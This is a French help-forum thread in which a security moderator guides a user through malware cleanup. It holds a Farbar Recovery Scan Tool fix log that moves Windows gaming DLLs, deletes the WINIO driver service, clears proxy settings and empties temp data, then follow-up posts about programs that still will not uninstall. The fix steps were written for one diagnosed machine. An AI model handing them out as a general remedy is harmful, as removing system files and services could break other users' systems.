C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll => déplacé(es) avec succès
C:\WINDOWS\system32\Windows.Gaming.Input.dll => déplacé(es) avec succès
Impossible de restaurer Hosts.
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 32768 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 25941675 B
Java, Flash, Steam htmlcache => 492 B
Windows/system/drivers => 2994199 B
Edge => 13824 B
Chrome => 0 B
Firefox => 378998108 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 0 B
LocalService => 2474 B
NetworkService => 0 B
bilal => 323538776 B
RecycleBin => 10407085 B
EmptyTemp: => 707.6 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
Voici le contenu du fichier texte :
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 24-05-2017
Exécuté par bilal (26-05-2017 16:06:28) Run:2
Exécuté depuis C:\Users\bilal\Desktop
Profils chargés: bilal (Profils disponibles: bilal)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
R3 WINIO; C:\Program Files (x86)\MSI\Dragon Gaming Center\winio64.sys [15160 2010-06-07] ()
2017-05-20 16:18 - 2017-05-20 16:18 - 00000000 ____D C:\ProgramData\Gaming Center
C:\Program Files (x86)\MSI\Dragon Gaming Center
2017-05-11 13:21 - 2017-04-28 02:16 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll
2017-05-11 13:21 - 2017-04-28 02:16 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll
2017-05-11 13:20 - 2017-04-28 01:59 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll
2017-05-11 13:18 - 2017-04-28 01:58 - 00547840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Input.dll
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
WINIO => Impossible d'arrêter le service.
HKLM\System\CurrentControlSet\Services\WINIO => clé supprimé(es) avec succès
WINIO => service supprimé(es) avec succès
C:\ProgramData\Gaming Center => déplacé(es) avec succès
C:\Program Files (x86)\MSI\Dragon Gaming Center => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll => déplacé(es) avec succès
C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll => déplacé(es) avec succès
C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll => déplacé(es) avec succès
C:\WINDOWS\system32\Windows.Gaming.Input.dll => déplacé(es) avec succès
Impossible de restaurer Hosts.
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-673139401-3804567535-1525832469-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 32768 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 25941675 B
Java, Flash, Steam htmlcache => 492 B
Windows/system/drivers => 2994199 B
Edge => 13824 B
Chrome => 0 B
Firefox => 378998108 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 0 B
LocalService => 2474 B
NetworkService => 0 B
bilal => 323538776 B
RecycleBin => 10407085 B
EmptyTemp: => 707.6 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
Fin de Fixlog 16:07:23
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
>
Pakikeuss
Messages postés
12
Date d'inscription
dimanche 21 mai 2017
Statut
Membre
Dernière intervention
28 mai 2017
27 mai 2017 à 00:04
27 mai 2017 à 00:04
du changement ?
Pakikeuss
Messages postés
12
Date d'inscription
dimanche 21 mai 2017
Statut
Membre
Dernière intervention
28 mai 2017
27 mai 2017 à 13:06
27 mai 2017 à 13:06
Non je ne peux toujours pas les désinstaller !
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
>
Pakikeuss
Messages postés
12
Date d'inscription
dimanche 21 mai 2017
Statut
Membre
Dernière intervention
28 mai 2017
27 mai 2017 à 13:49
27 mai 2017 à 13:49
Il a été viré manuellement, je parle des fenêtres CMD.
Pakikeuss
Messages postés
12
Date d'inscription
dimanche 21 mai 2017
Statut
Membre
Dernière intervention
28 mai 2017
28 mai 2017 à 12:47
28 mai 2017 à 12:47
J'ai remarqué qu'au dernier redémarrage la fenêtre DOS ne s'est pas ouverte,
En revanche les programmes ne sont toujours pas virés je peux les voir sur le panneau de configuration, et par ailleurs il y en a d'autres qui ne s'enlèvent pas comme un "ByteFence Anti-Malware" qui ont le même problème.
En revanche les programmes ne sont toujours pas virés je peux les voir sur le panneau de configuration, et par ailleurs il y en a d'autres qui ne s'enlèvent pas comme un "ByteFence Anti-Malware" qui ont le même problème.
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
jumulka
Messages postés
12146
Date d'inscription
vendredi 14 décembre 2012
Statut
Membre
Dernière intervention
13 avril 2024
4 552
21 mai 2017 à 23:49
21 mai 2017 à 23:49
Bonjour,
surrement une application qui démarre à l'ouverture de session ou un pti truc de windows, tant qu'il n'y a pas de problème, bha... ya pas de problème :)
surrement une application qui démarre à l'ouverture de session ou un pti truc de windows, tant qu'il n'y a pas de problème, bha... ya pas de problème :)
Pakikeuss
Messages postés
12
Date d'inscription
dimanche 21 mai 2017
Statut
Membre
Dernière intervention
28 mai 2017
22 mai 2017 à 02:07
22 mai 2017 à 02:07
Bonjour,
Ce n'est pas le genre de réponse que j'attends, mais merci quand même:)
Ce n'est pas le genre de réponse que j'attends, mais merci quand même:)
22 mai 2017 à 02:17
Merci d'avoir répondu, mais malheureusement cela n'a pas marché
J'ai aussi bloqué tous mes programmes au démarrages via le gestionnaire des tâches au cas où mais ça ne fonctionne pas non plus